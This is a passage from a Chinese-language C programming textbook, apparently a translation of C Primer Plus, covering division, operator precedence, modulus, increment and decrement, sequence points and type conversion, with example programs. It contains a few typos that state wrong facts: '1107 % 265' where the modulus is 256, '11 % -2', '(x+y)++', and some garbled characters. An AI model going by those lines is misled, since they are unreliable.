程序清单5.6 divide.c程序 /* divide.c -- 演示除法 */ 255 #include <stdio.h> int main(void) { printf("integer division:  5/4  is %d \n", 5 / 4); printf("integer division:  6/3  is %d \n", 6 / 3); printf("integer division:  7/4  is %d \n", 7 / 4); printf("floating division: 7./4. is %1.2f \n", 7. / 4.); printf("mixed division:   7./4  is %1.2f \n", 7. / 4); return 0; } 程序清单5.6中包含一个“混合类型”的示例,即浮点值除以整型值。C相 对其他一些语言而言,在类型管理上比较宽容。尽管如此,一般情况下还是 要避免使用混合类型。该程序的输出如下: integer division:  5/4   is 1 integer division:  6/3   is 2 integer division:  7/4   is 1 floating division: 7./4. is 1.75 mixed division:   7./4  is 1.75 注意,整数除法会截断计算结果的小数部分(丢弃整个小数部分),不 会四舍五入结果。混合整数和浮点数计算的结果是浮点数。实际上,计算机 256 不能真正用浮点数除以整数,编译器会把两个运算对象转换成相同的类型。 本例中,在进行除法运算前,整数会被转换成浮点数。 C99标准以前,C语言给语言的实现者留有一些空间,让他们来决定如 何进行负数的整数除法。一种方法是,舍入过程采用小于或等于浮点数的最 大整数。当然,对于3.8而言,处理后的3符合这一描述。但是-3.8 会怎样? 该方法建议四舍五入为-4,因为-4 小于-3.8.但是,另一种舍入方法是直接丢 弃小数部分。这种方法被称为“趋零截断”,即把-3.8转换成-3。在C99以前, 不同的实现采用不同的方法。但是C99规定使用趋零截断。所以,应把-3.8 转换成-3。 5.2.7 运算符优先级 考虑下面的代码: butter = 25.0 + 60.0 * n / SCALE; 这条语句中有加法、乘法和除法运算。先算哪一个?是25.0加上60.0, 然后把计算的和85.0乘以n,再把结果除以SCALE?还是60.0乘以n,然后把 计算的结果加上25.0,最后再把结果除以SCALE?还是其他运算顺序?假设 n是6.0,SCALE是2.0,带入语句中计算会发现,第1种顺序得到的结果是 255,第2种顺序得到的结果是192.5。C程序一定是采用了其他的运算顺序, 因为程序运行该语句后,butter的值是205.0。 显然,执行各种操作的顺序很重要。C 语言对此有明确的规定,通过运 算符优先级来解决操作顺序的问题。每个运算符都有自己的优先级。正如普 通的算术运算那样,乘法和除法的优先级比加法和减法高,所以先执行乘法 和除法。如果两个运算符的优先级相同怎么办?如果它们处理同一个运算对 象,则根据它们在语句中出现的顺序来执行。对大多数运算符而言,这种情 况都是按从左到右的顺序进行(=运算符除外)。因此,语句: butter = 25.0 + 60.0 * n / SCALE; 257 的运算顺序是: 60.0 * n     首先计算表达式中的*或/(假设n的值是6,所以 60.0*n得360.0) 360.0 / SCALE   然后计算表达式中第2个*或/ 25.0 + 180     最后计算表达式里第1个+或-,结果为205.0(假设 SCALE的值是2.0) 许多人喜欢用表达式树(expression tree)来表示求值的顺序,如图5.3 所示。该图演示了如何从最初的表达式逐步简化为一个值。 图5.3 用表达式树演示运算符、运算对象和求值顺序 如何让加法运算在乘法运算之前执行?可以这样做: flour = (25.0 + 60.0 * n) / SCALE; 最先执行圆括号中的部分。圆括号内部按正常的规则执行。该例中,先 执行乘法运算,再执行加法运算。执行完圆括号内的表达式后,用运算结果 除以SCALE。 258 表5.1总结了到目前为止学过的运算符优先级。 表5.1 运算符优先级(从低至高) 注意正号(加号)和负号(减号)的两种不同用法。结合律栏列出了运 算符如何与运算对象结合。例如,一元负号与它右侧的量相结合,在除法中 用除号左侧的运算对象除以右侧的运算对象。 5.2.8 优先级和求值顺序 运算符优先级为表达式中的求值顺序提供重要的依据,但是并没有规定 所有的顺序。C 给语言的实现者留出选择的余地。考虑下面的语句: y = 6 * 12 + 5 * 20; 当运算符共享一个运算对象时,优先级决定了求值顺序。例如上面的语 句中,12是*和+运算符的运算对象。根据运算符的优先级,乘法的优先级比 加法高,所以先进行乘法运算。类似地,先对 5 进行乘法运算而不是加法运 算。简而言之,先进行两个乘法运算6 * 12和5 * 20,再进行加法运算。但 是,优先级并未规定到底先进行哪一个乘法。C 语言把主动权留给语言的实 现者,根据不同的硬件来决定先计算前者还是后者。可能在一种硬件上采用 某种方案效率更高,而在另一种硬件上采用另一种方案效率更高。无论采用 哪种方案,表达式都会简化为 72 + 100,所以这并不影响最终的结果。但 是,读者可能会根据乘法从左往右的结合律,认为应该先执行+运算符左边 的乘法。结合律只适用于共享同一运算对象运算符。例如,在表达式12 / 3 * 2中,/和*运算符的优先级相同,共享运算对象3。因此,从左往右的结合律 在这种情况起作用。表达式简化为4 * 2,即8(如果从右往左计算,会得到 259 12/6,即2,这种情况下计算的先后顺序会影响最终的计算结果)。在该例 中,两个*运算符并没有共享同一个运算对象,因此从左往右的结合律不适 用于这种情况。 学以致用 接下来,我们在更复杂的示例中使用以上规则,请看程序清单5.7。 程序清单5.7 rules.c程序 /* rules.c -- 优先级测试 */ #include <stdio.h> int main(void) { int top, score; top = score = -(2 + 5) * 6 + (4 + 3 * (2 + 3)); printf("top = %d, score = %d\n", top, score); return 0; } 该程序会打印什么值?先根据代码推测一下,再运行程序或阅读下面的 分析来检查你的答案。 首先,圆括号的优先级最高。先计算-(2 + 5) * 6中的圆括号部分,还是 先计算(4 + 3 * (2 + 3))中的圆括号部分取决于具体的实现。圆括号的最高优 先级意味着,在子表达式-(2 + 5) * 6中,先计算(2 + 5)的值,得7。然后,把 一元负号应用在7上,得-7。现在,表达式是: 260 top = score = -7 * 6 + (4 + 3 * (2 + 3)) 下一步,计算2 + 3的值。表达式变成: top = score = -7 * 6 + (4 + 3 * 5) 接下来,因为圆括号中的*比+优先级高,所以表达式变成: top = score = -7 * 6 + (4 + 15) 然后,表达式为: top = score = -7 * 6 + 19 -7乘以6后,得到下面的表达式: top = score = -42 + 19 然后进行加法运算,得到: top = score = -23 现在,-23被赋值给score,最终top的值也是-23。记住,=运算符的结合 律是从右往左。 261 5.3 其他运算符 C语言有大约40个运算符,有些运算符比其他运算符常用得多。前面讨 论的是最常用的,本节再介绍4个比较有用的运算符。 5.3.1 sizeof运算符和size_t类型 读者在第3章就见过sizeof运算符。回顾一下,sizeof运算符以字节为单 位返回运算对象的大小(在C中,1字节定义为char类型占用的空间大小。过 去,1字节通常是8位,但是一些字符集可能使用更大的字节)。运算对象可 以是具体的数据对象(如,变量名)或类型。如果运算对象是类型(如, float),则必须用圆括号将其括起来。程序清单5.8演示了这两种用法。 程序清单5.8 sizeof.c程序 // sizeof.c -- 使用sizeof运算符 // 使用C99新增的%zd转换说明 -- 如果编译器不支持%zd,请将其改 成%u或%lu #include <stdio.h> int main(void) { int n = 0; size_t intsize; intsize = sizeof (int); printf("n = %d, n has %zd bytes; all ints have %zd  bytes.\n", 262 n, sizeof n, intsize); return 0; } C 语言规定,sizeof 返回 size_t 类型的值。这是一个无符号整数类型, 但它不是新类型。前面介绍过,size_t是语言定义的标准类型。C有一个 typedef机制(第14章再详细介绍),允许程序员为现有类型创建别名。例 如, typedef double real; 这样,real就是double的别名。现在,可以声明一个real类型的变量: real deal; // 使用typedef 编译器查看real时会发现,在typedef声明中real已成为double的别名,于 是把deal创建为double 类型的变量。类似地,C 头文件系统可以使用 typedef 把 size_t 作为 unsigned int 或unsigned long的别名。这样,在使用size_t类型 时,编译器会根据不同的系统替换标准类型。 C99 做了进一步调整,新增了%zd 转换说明用于 printf()显示 size_t 类型 的值。如果系统不支持%zd,可使用%u或%lu代替%zd。 5.3.2 求模运算符:% 求模运算符(modulus operator)用于整数运算。求模运算符给出其左侧 整数除以右侧整数的余数(remainder)。例如,13 % 5(读作“13求模5”) 得3,因为13比5的两倍多3,即13除以5的余数是3。求模运算符只能用于整 数,不能用于浮点数。 乍一看会认为求模运算符像是数学家使用的深奥符号,但是实际上它非 常有用。求模运算符常用于控制程序流。例如,假设你正在设计一个账单预 263 算程序,每 3 个月要加进一笔额外的费用。这种情况可以在程序中对月份求 模3(即,month % 3),并检查结果是否为0。如果为0,便加进额外的费 用。等学到第7章的if语句后,读者会更明白。 程序清单5.9演示了%运算符的另一种用途。同时,该程序也演示了 while循环的另一种用法。 程序清单5.9 min_sec.c程序 // min_sec.c -- 把秒数转换成分和秒 #include <stdio.h> #define SEC_PER_MIN 60      // 1分钟60秒 int main(void) { int sec, min, left; printf("Convert seconds to minutes and seconds!\n"); printf("Enter the number of seconds (<=0 to quit):\n"); scanf("%d", &sec);      // 读取秒数 while (sec > 0) { min = sec / SEC_PER_MIN;  // 截断分钟数 left = sec % SEC_PER_MIN;  // 剩下的秒数 printf("%d seconds is %d minutes, %d seconds.\n", sec, 264 min, left); printf("Enter next value (<=0 to quit):\n"); scanf("%d", &sec); } printf("Done!\n"); return 0; } 该程序的输出如下: 程序清单5.2使用一个计数器来控制while循环。当计数器超出给定的大 小时,循环终止。而程序清单5.9则通过scanf()为变量sec获取一个新值。只 要该值为正,循环就继续。当用户输入一个0或负值时,循环退出。这两种 情况设计的要点是,每次循环都会修改被测试的变量值。 负数求模如何进行?C99规定“趋零截断”之前,该问题的处理方法很 多。但自从有了这条规则之后,如果第1个运算对象是负数,那么求模的结 果为负数;如果第1个运算对象是正数,那么求模的结果也是正数: 265 11 / 5得2,11 % 5得1 11 / -5得-2,11 % -2得1 -11 / -5得2,-11 % -5得-1 -11 / 5得-2,-11 % 5得-1 如果当前系统不支持C99标准,会显示不同的结果。实际上,标准规 定:无论何种情况,只要a和b都是整数值,便可通过a - (a/b)*b来计算a%b。 例如,可以这样计算-11%5: -11 - (-11/5) * 5 = -11 -(-2)*5 = -11 -(-10) = -1 5.3.3 递增运算符:++ 递增运算符(increment operator)执行简单的任务,将其运算对象递增 1。该运算符以两种方式出现。第1种方式,++出现在其作用的变量前面, 这是前缀模式;第2种方式,++出现在其作用的变量后面,这是后缀模式。 两种模式的区别在于递增行为发生的时间不同。我们先解释它们的相似之 处,再分析它们不同之处。程序清单5.10中的程序示例演示了递增运算符是 如何工作的。 程序清单5.10 add_one.c程序 /* add_one.c -- 递增:前缀和后缀 */ #include <stdio.h> int main(void) { int ultra = 0, super = 0; while (super < 5) 266 { super++; ++ultra; printf("super = %d, ultra = %d \n", super, ultra); } return 0; } 运行该程序后,其输出如下: super = 1, ultra = 1 super = 2, ultra = 2 super = 3, ultra = 3 super = 4, ultra = 4 super = 5, ultra = 5 该程序两次同时计数到5。用下面两条语句分别代替程序中的两条递增 语句,程序的输出相同: super = super + 1; ultra = ultra + 1; 这些都是很简单的语句,为何还要创建两个缩写形式?原因之一是,紧 凑结构的代码让程序更为简洁,可读性更高。这些运算符让程序看起来很美 观。例如,可重写程序清单5.2(shoes2.c)中的一部分代码: 267 shoe = 3.0; while (shoe < 18.5) { foot = SCALE * size + ADJUST; printf("%10.1f %20.2f inches\n", shoe, foot); ++shoe; } 但是,这样做也没有充分利用递增运算符的优势。还可以这样缩短这段 程序: shoe = 2.0; while (++shoe < 18.5) { foot = SCALE*shoe + ADJUST; printf("%10.1f %20.2f inches\n", shoe, foot); } 如上代码所示,把变量的递增过程放入while循环的条件中。这种结构 在C语言中很普遍,我们来仔细分析一下。 首先,这样的while循环是如何工作的?很简单。shoe的值递增1,然后 和18.5作比较。如果递增后的值小于18.5,则执行花括号内的语句一次。然 后,shoe的值再递增1,重复刚才的步骤,直到shoe的值不小于18.5为止。注 意,我们把shoe的初始值从3.0改为2.0,因为在对foot第1次求值之前, shoe 268 已经递增了1(见图5.4)。 图5.4 执行一次循环 其次,这样做有什么好处?它使得程序更加简洁。更重要的是,它把控 制循环的两个过程集中在一个地方。该循环的主要过程是判断是否继续循环 (本例中,要检查鞋子的尺码是否小于 18.5),次要过程是改变待测试的元 素(本例中是递增鞋子的尺码)。 如果忘记改变鞋子的尺码,shoe的值会一直小于18.5,循环不会停止。 计算机将陷入无限循环(infinite loop)中,生成无数相同的行。最后,只能 强行关闭这个程序。把循环测试和更新循环放在一处,就不会忘记更新循 环。 但是,把两个操作合并在一个表达式中,降低了代码的可读性,让代码 难以理解。而且,还容易产生计数错误。 递增运算符的另一个优点是,通常它生成的机器语言代码效率更高,因 为它和实际的机器语言指令很相似。尽管如此,随着商家推出的C编译器越 来越智能,这一优势可能会消失。一个智能的编译器可以把x = x + 1当作 ++x对待。 最后,递增运算符还有一个在某些场合特别有用的特性。我们通过程序 269 清单5.11来说明。 程序清单5.11 post_pre.c程序 /* post_pre.c -- 前缀和后缀 */ #include <stdio.h> int main(void) { int a = 1, b = 1; int a_post, pre_b; a_post = a++; // 后缀递增 pre_b = ++b;  // 前缀递增 printf("a  a_post  b  pre_b \n"); printf("%1d %5d %5d %5d\n", a, a_post, b, pre_b); return 0; } 如果你的编译器没问题,那么程序的输出应该是: a   a_post  b   pre_b 2       1  2      2 a和b都递增了1,但是,a_post是a递增之前的值,而b_pre是b递增之后 的值。这就是++的前缀形式和后缀形式的区别(见图5.5)。 270 图5.5 前缀和后缀 a_post = a++;   // 后缀:使用a的值乊后,递增a b_pre= ++b;    // 前缀:使用b的值乊前,递增b 单独使用递增运算符时(如,ego++;),使用哪种形式都没关系。但 是,当运算符和运算对象是更复杂表达式的一部分时(如上面的示例),使 用前缀或后缀的效果不同。例如,我们曾经建议用下面的代码: while (++shoe < 18.5) 该测试条件相当于提供了一个鞋子尺码到18的表。如果使用shoe++而不 是++shoes,尺码表会增至19。因为shoe会在与18.5进行比较之后才递增,而 不是先递增再比较。 当然,使用下面这种形式也没错: shoe = shoe + 1; 只不过,有人会怀疑你是否是真正的C程序员。 271 在学习本书的过程中,应多留意使用递增运算符的例子。自己思考是否 能互换使用前缀和后缀形式,或者当前环境是否只能使用某种形式。 如果使用前缀形式和后缀形式会对代码产生不同的影响,那么最为明智 的是不要那样使用它们。例如,不要使用下面的语句: b = ++i; // 如果使用i++,会得到不同的结果 应该使用下列语句: ++i;   // 第1行 b = i; // 如果第1行使用的是i++,幵不会影响b的值 尽管如此,有时小心翼翼地使用会更有意思。所以,本书会根据实际情 况,采用不同的写法。 5.3.4 递减运算符:-- 每种形式的递增运算符都有一个递减运算符(decrement operator)与之 对应,用--代替++即可: --count; // 前缀形式的递减运算符 count--; // 后缀形式的递减运算符 程序清单5.12演示了计算机可以是位出色的填词家。 程序清单5.12 bottles.c程序 #include <stdio.h> #define MAX 100 int main(void) 272 { int count = MAX + 1; while (--count > 0) { printf("%d bottles of spring water on the wall, " "%d bottles of spring water!\n", count, count); printf("Take one down and pass it around,\n"); printf("%d bottles of spring water!\n\n", count - 1); } return 0; } 该程序的输出如下(篇幅有限,省略了中间大部分输出): 100 bottles of spring water on the wall, 100 bottles of  spring water! Take one down and pass it around, 99 bottles of spring water! 99 bottles of spring water on the wall, 99 bottles of  spring water! Take one down and pass it around, 98 bottles of spring water! ... 273 1 bottles of spring water on the wall, 1 bottles of spring water! Take one down and pass it around, 0 bottles of spring water! 显然,这位填词家在复数的表达上有点问题。在学完第7章中的条件运 算符后,可以解决这个问题。 顺带一提,>运算符表示“大于”,<运算符表示“小于”,它们都是关系运 算符(relational operator)。我们将在第6章中详细介绍关系运算符。 5.3.5 优先级 递增运算符和递减运算符都有很高的结合优先级,只有圆括号的优先级 比它们高。因此,x*y++表示的是(x)*(y++),而不是(x+y)++。不过后者无 效,因为递增和递减运算符只能影响一个变量(或者,更普遍地说,只能影 响一个可修改的左值),而组合x*y本身不是可修改的左值。 不要混淆这两个运算符的优先级和它们的求值顺序。假设有如下语句: y = 2; n = 3; nextnum = (y + n++)*6; nextnum的值是多少?把y和n的值带入上面的第3条语句得: nextnum = (2 + 3)*6 = 5*6 = 30 n的值只有在被使用之后才会递增为4。根据优先级的规定,++只作用 于n,不作用与y + n。除此之外,根据优先级可以判断何时使用n的值对表达 式求值,而递增运算符的性质决定了何时递增n的值。 如果n++是表达式的一部分,可将其视为“先使用n,再递增”;而++n则 274 表示“先递增n,再使用”。 5.3.6 不要自作聪明 如果一次用太多递增运算符,自己都会糊涂。例如,利用递增运算符改 进 squares.c 程序(程序清单5.4),用下面的while循环替换原程序中的while 循环: while (num < 21) { printf("%10d %10d\n", num, num*num++); } 这个想法看上去不错。打印num,然后计算num*num得到平方值,最后 把num递增1。但事实上,修改后的程序只能在某些系统上能正常运行。该 程序的问题是:当 printf()获取待打印的值时,可能先对最后一个参数( ) 求值,这样在获取其他参数的值之前就递增了num。所以,本应打印: 5       25 却打印成: 6       25 它甚至可能从右往左执行,对最右边的num(++作用的num)使用5,对 第2个num和最左边的num使用6,结果打印出: 6       30 在C语言中,编译器可以自行选择先对函数中的哪个参数求值。这样做 提高了编译器的效率,但是如果在函数的参数中使用了递增运算符,就会有 一些问题。 275 类似这样的语句,也会导致一些麻烦: ans = num/2 + 5*(1 + num++); 同样,该语句的问题是:编译器可能不会按预想的顺序来执行。你可能 认为,先计算第1项(num/2),接着计算第2项(5*(1 + num++))。但是, 编译器可能先计算第2项,递增num,然后在num/2中使用num递增后的新 值。因此,无法保证编译器到底先计算哪一项。 还有一种情况,也不确定: n = 3; y = n++ + n++; 可以肯定的是,执行完这两条语句后,n的值会比旧值大2。但是,y的 值不确定。在对y求值时,编译器可以使用n的旧值(3)两次,然后把n递增 1两次,这使得y的值为6,n的值为5。或者,编译器使用n的旧值(3)一 次,立即递增n,再对表达式中的第2个n使用递增后的新值,然后再递增n, 这使得 y 的值为 7,n 的值为 5。两种方案都可行。对于这种情况更精确地 说,结果是未定义的,这意味着 C标准并未定义结果应该是什么。 遵循以下规则,很容易避免类似的问题: 如果一个变量出现在一个函数的多个参数中,不要对该变量使用递增或 递减运算符; 如果一个变量多次出现在一个表达式中,不要对该变量使用递增或递减 运算符。 另一方面,对于何时执行递增,C 还是做了一些保证。我们在本章后面 的“副作用和序列点”中学到序列点时再来讨论这部分内容。 276 5.4 表达式和语句 在前几章中,我们已经多次使用了术语表达式(expression)和语句 (statement)。现在,我们来进一步学习它们。C的基本程序步骤由语句组 成,而大多数语句都由表达式构成。因此,我们先学习表达式。 5.4.1 表达式 表达式(expression)由运算符和运算对象组成(前面介绍过,运算对 象是运算符操作的对象)。最简单的表达式是一个单独的运算对象,以此为 基础可以建立复杂的表达式。下面是一些表达式: 4 -6 4+21 a*(b + c/d)/20 q = 5*2 x = ++q % 3 q > 3 如你所见,运算对象可以是常量、变量或二者的组合。一些表达式由子 表达式(subexpression)组成(子表达式即较小的表达式)。例如,c/d是上 面例子中a*(b + c/d)/20的子表达式。 每个表达式都有一个值 C 表达式的一个最重要的特性是,每个表达式都有一个值。要获得这个 值,必须根据运算符优先级规定的顺序来执行操作。在上面我们列出的表达 式中,前几个都很清晰明了。但是,有赋值运算符(=)的表达式的值是什 277 么?这些表达式的值与赋值运算符左侧变量的值相同。因此,表达式q = 5*2 作为一个整体的值是10。那么,表达式q > 3的值是多少?这种关系表达式 的值不是0就是1,如果条件为真,表达式的值为1;如果条件为假,表达式 的值为0。表5.2列出了一些表达式及其值: 表5.2 一些表达式及其值 虽然最后一个表达式看上去很奇怪,但是在C中完全合法(但不建议使 用),因为它是两个子表达式的和,每个子表达式都有一个值。 5.4.2 语句 语句(statement)是C程序的基本构建块。一条语句相当于一条完整的 计算机指令。在C中,大部分语句都以分号结尾。因此, legs = 4 只是一个表达式(它可能是一个较大表达式的一部分),而下面的代码 则是一条语句: legs = 4; 最简单的语句是空语句: ;   //空语句 C把末尾加上一个分号的表达式都看作是一条语句(即,表达式语 句)。因此,像下面这样写也没问题: 8; 278 3 + 4; 但是,这些语句在程序中什么也不做,不算是真正有用的语句。更确切 地说,语句可以改变值或调用函数: x = 25; ++x; y = sqrt(x); 虽然一条语句(或者至少是一条有用的语句)相当于一条完整的指令, 但并不是所有的指令都是语句。考虑下面的语句: x = 6 + (y = 5); 该语句中的子表达式y = 5是一条完整的指令,但是它只是语句的一部 分。因为一条完整的指令不一定是一条语句,所以分号用于识别在这种情况 下的语句(即,简单语句)。 到目前为止,读者已经见过多种语句(不包括空语句)。程序清单5.13 演示了一些常见的语句。 程序清单5.13 addemup.c程序 /* addemup.c -- 几种常见的语句 */ #include <stdio.h> int main(void)         /* 计算前20个整数的和  */ { int count, sum;     /* 声明[1]       */ count = 0;         /* 表达式语句      */ 279 sum = 0;          /* 表达式语句      */ while (count++ < 20)    /* 迭代语句      */ sum = sum + count; printf("sum = %d\n", sum); /* 表达式语句[2]     */ return 0;       /* 跳转语句         */ } 下面我们讨论程序清单 5.13。到目前为止,相信读者已经很熟悉声明 了。尽管如此,我们还是要提醒读者:声明创建了名称和类型,并为其分配 内存位置。注意,声明不是表达式语句。也就是说,如果删除声明后面的分 号,剩下的部分不是一个表达式,也没有值: int port /* 不是表达式,没有值 */ 赋值表达式语句在程序中很常用:它为变量分配一个值。赋值表达式语 句的结构是,一个变量名,后面是一个赋值运算符,再跟着一个表达式,最 后以分号结尾。注意,在while循环中有一个赋值表达式语句。赋值表达式 语句是表达式语句的一个示例。 函数表达式语句会引起函数调用。在该例中,调用printf()函数打印结 果。while语句有3个不同的部分(见图5.6)。首先是关键字while;然后, 圆括号中是待测试的条件;最后如果测试条件为真,则执行while循环体中 的语句。该例的while循环中只有一条语句。可以是本例那样的一条语句, 不需要用花括号括起来,也可以像其他例子中那样包含多条语句。多条语句 需要用花括号括起来。这种语句是复合语句,稍后马上介绍。 280 图5.6 简单的while循环结构 while语句是一种迭代语句,有时也被称为结构化语句,因为它的结构 比简单的赋值表达式语句复杂。在后面的章节里,我们会遇到许多这样的语 句。 副作用和序列点 我们再讨论一个C语言的术语副作用(side effect)。副作用是对数据对 象或文件的修改。例如,语句: states = 50; 它的副作用是将变量的值设置为50。副作用?这似乎更像是主要目的! 但是从C语言的角度看,主要目的是对表达式求值。给出表达式4 + 6,C会 对其求值得10;给出表达式states = 50,C会对其求值得50。对该表达式求值 的副作用是把变量states的值改为50。跟赋值运算符一样,递增和递减运算 符也有副作用,使用它们的主要目的就是使用其副作用。 类似地,调用 printf()函数时,它显示的信息其实是副作用(printf()的返 回值是待显示字符的个数)。 281 序列点(sequence point)是程序执行的点,在该点上,所有的副作用都 在进入下一步之前发生。在 C语言中,语句中的分号标记了一个序列点。意 思是,在一个语句中,赋值运算符、递增运算符和递减运算符对运算对象做 的改变必须在程序执行下一条语句之前完成。后面我们要讨论的一些运算符 也有序列点。另外,任何一个完整表达式的结束也是一个序列点。 什么是完整表达式?所谓完整表达式(full expression),就是指这个表 达式不是另一个更大表达式的子表达式。例如,表达式语句中的表达式和 while循环中的作为测试条件的表达式,都是完整表达式。 序列点有助于分析后缀递增何时发生。例如,考虑下面的代码: while (guests++ < 10) printf("%d \n", guests); 对于该例,C语言的初学者认为“先使用值,再递增它”的意思是,在 printf()语句中先使用guests,再递增它。但是,表达式guests++ < 10是一个完 整的表达式,因为它是while循环的测试条件,所以该表达式的结束就是一 个序列点。因此,C 保证了在程序转至执行 printf()之前发生副作用(即,递 增guests)。同时,使用后缀形式保证了guests在完成与10的比较后才进行递 增。 现在,考虑下面这条语句: y = (4 + x++) + (6 + x++); 表达式4 + x++不是一个完整的表达式,所以C无法保证x在子表达式4 + x++求值后立即递增x。这里,完整表达式是整个赋值表达式语句,分号标记 了序列点。所以,C 保证程序在执行下一条语句之前递增x两次。C并未指明 是在对子表达式求值以后递增x,还是对所有表达式求值后再递增x。因此, 要尽量避免编写类似的语句。 5.4.3 复合语句(块) 282 复合语句(compound statement)是用花括号括起来的一条或多条语句, 复合语句也称为块(block)。shoes2.c程序使用块让while语句包含多条语 句。比较下面两个程序段: /* 程序段 1 */ index = 0; while (index++ < 10) sam = 10 * index + 2; printf("sam = %d\n", sam); /* 程序段 2 */ index = 0; while (index++ < 10) { sam = 10 * index + 2; printf("sam = %d\n", sam); } 程序段1,while循环中只有一条赋值表达式语句。没有花括号,while语 句从while这行运行至下一个分号。循环结束后,printf()函数只会被调用一 次。 程序段2,花括号确保两条语句都是while循环的一部分,每执行一次循 环就调用一次printf()函数。根据while语句的结构,整个复合语句被视为一 条语句(见图5.7)。 283 图5.7 带复合语句的while循环 提示 风格提示 再看一下前面的两个while程序段,注意循环体中的缩进。缩进对编译 器不起作用,编译器通过花括号和while循环的结构来识别和解释指令。这 里,缩进是为了让读者一眼就可以看出程序是如何组织的。 程序段2中,块或复合语句放置花括号的位置是一种常见的风格。另一 种常用的风格是: while (index++ < 10) { sam = 10*index + 2; printf("sam = %d \n", sam); } 284 这种风格突出了块附属于while循环,而前一种风格则强调语句形成一 个块。对编译器而言,这两种风格完全相同。 总而言之,使用缩进可以为读者指明程序的结构。 总结 表达式和语句 表达式: 表达式由运算符和运算对象组成。最简单的表达式是不带运算符的一个 常量或变量(如,22 或beebop)。更复杂的例子是55 + 22和vap = 2 * (vip + (vup = 4))。 语句: 到目前为止,读者接触到的语句可分为简单语句和复合语句。简单语句 以一个分号结尾。如下所示: 赋值表达式语句:   toes = 12; 函数表达式语句:   printf("%d\n", toes); 空语句:      ;  /* 什么也不做 */ 复合语句(或块)由花括号括起来的一条或多条语句组成。如下面的 while语句所示: while (years < 100) { wisdom = wisdom * 1.05; printf("%d %d\n", years, wisdom); years = years + 1; 285 } 286 5.5 类型转换 通常,在语句和表达式中应使用类型相同的变量和常量。但是,如果使 用混合类型,C 不会像 Pascal那样停在那里死掉,而是采用一套规则进行自 动类型转换。虽然这很便利,但是有一定的危险性,尤其是在无意间混合使 用类型的情况下(许多UNIX系统都使用lint程序检查类型“冲突”。如果选择 更高错误级别,许多非UNIX C编译器也可能报告类型问题)。最好先了解 一些基本的类型转换规则。 1.当类型转换出现在表达式时,无论是unsigned还是signed的char和short 都会被自动转换成int,如有必要会被转换成unsigned int(如果short与int的大 小相同,unsigned short就比int大。这种情况下,unsigned short会被转换成 unsigned int)。在K&R那时的C中,float会被自动转换成double(目前的C不 是这样)。由于都是从较小类型转换为较大类型,所以这些转换被称为升级 (promotion)。 2.涉及两种类型的运算,两个值会被分别转换成两种类型的更高级别。 3.类型的级别从高至低依次是long double、double、float、unsignedlong long、long long、unsigned long、long、unsigned int、int。例外的情况是,当 long 和 int 的大小相同时,unsigned int比long的级别高。之所以short和char类 型没有列出,是因为它们已经被升级到int或unsigned int。 4.在赋值表达式语句中,计算的最终结果会被转换成被赋值变量的类 型。这个过程可能导致类型升级或降级(demotion)。所谓降级,是指把一 种类型转换成更低级别的类型。 5.当作为函数参数传递时,char和short被转换成int,float被转换成 double。第9章将介绍,函数原型会覆盖自动升级。 类型升级通常都不会有什么问题,但是类型降级会导致真正的麻烦。原 因很简单:较低类型可能放不下整个数字。例如,一个8位的char类型变量 储存整数101没问题,但是存不下22334。 287 如果待转换的值与目标类型不匹配怎么办?这取决于转换涉及的类型。 待赋值的值与目标类型不匹配时,规则如下。 1.目标类型是无符号整型,且待赋的值是整数时,额外的位将被忽略。 例如,如果目标类型是 8 位unsigned char,待赋的值是原始值求模256。 2.如果目标类型是一个有符号整型,且待赋的值是整数,结果因实现而 异。 3.如果目标类型是一个整型,且待赋的值是浮点数,该行为是未定义 的。 如果把一个浮点值转换成整数类型会怎样?当浮点类型被降级为整数类 型时,原来的浮点值会被截断。例如,23.12和23.99都会被截断为23,-23.5 会被截断为-23。 程序清单5.14演示了这些规则。 程序清单5.14 convert.c程序 /* convert.c -- 自动类型转换 */ #include <stdio.h> int main(void) { char ch; int i; float fl; fl = i = ch = 'C';                  /* 第9行 */ 288 printf("ch = %c, i = %d, fl = %2.2f\n", ch, i, fl); /* 第10行 */ ch = ch + 1;                     /* 第11行 */ i = fl + 2 * ch;                   /* 第12行 */ fl = 2.0 * ch + i;                  /* 第13行 */ printf("ch = %c, i = %d, fl = %2.2f\n", ch, i, fl); /* 第14行 */ ch = 1107;                      /* 第15行 */ printf("Now ch = %c\n", ch);             /* 第16行 */ ch = 80.89;                     /* 第17行 */ printf("Now ch = %c\n", ch);             /* 第18行 */ return 0; } 运行convert.c后输出如下: ch = C, i = 67, fl = 67.00 ch = D, i = 203, fl = 339.00 Now ch = S Now ch = P 在我们的系统中,char是8位,int是32位。程序的分析如下。 第9行和第10行:字符'C'被作为1字节的ASCII值储存在ch中。整数变量i 接受由'C'转换的整数,即按4字节储存67。最后,fl接受由67转换的浮点数 67.00。 289 第11行和第14行:字符变量'C'被转换成整数67,然后加1。计算结果是4 字节整数68,被截断成1字节储存在ch中。根据%c转换说明打印时,68被解 释成'D'的ASCII码。 第12行和第14行:ch的值被转换成4字节的整数(68),然后2乘以ch。 为了和fl相加,乘积整数(136)被转换成浮点数。计算结果(203.00f)被 转换成int类型,并储存在i中。 第13行和第14行:ch的值('D',或68)被转换成浮点数,然后2乘以 ch。为了做加法,i的值(203)被转换为浮点类型。计算结果(339.00)被 储存在fl中。 第15行和第16行:演示了类型降级的示例。把ch设置为一个超出其类型 范围的值,忽略额外的位后,最终ch的值是字符S的ASCII码。或者,更确切 地说,ch的值是1107 % 265,即83。 第17行和第18行:演示了另一个类型降级的示例。把ch设置为一个浮点 数,发生截断后,ch的值是字符P的ASCII码。 5.5.1 强制类型转换运算符 通常,应该避免自动类型转换,尤其是类型降级。但是如果能小心使 用,类型转换也很方便。我们前面讨论的类型转换都是自动完成的。然而, 有时需要进行精确的类型转换,或者在程序中表明类型转换的意图。这种情 况下要用到强制类型转换(cast),即在某个量的前面放置用圆括号括起来 的类型名,该类型名即是希望转换成的目标类型。圆括号和它括起来的类型 名构成了强制类型转换运算符(cast operator),其通用形式是: (type) 用实际需要的类型(如,long)替换type即可。 考虑下面两行代码,其中mice是int类型的变量。第2行包含两次int强制 类型转换。 290 mice = 1.6 + 1.7; mice = (int)1.6 + (int)1.7; 第1 行使用自动类型转换。首先,1.6和1.7相加得3.3。然后,为了匹配 int 类型的变量,3.3被类型转换截断为整数3。第2行,1.6和1.7在相加之前都 被转换成整数(1),所以把1+1的和赋给变量mice。本质上,两种类型转换 都好不到哪里去,要考虑程序的具体情况再做取舍。 一般而言,不应该混合使用类型(因此有些语言直接不允许这样做), 但是偶尔这样做也是有用的。C语言的原则是避免给程序员设置障碍,但是 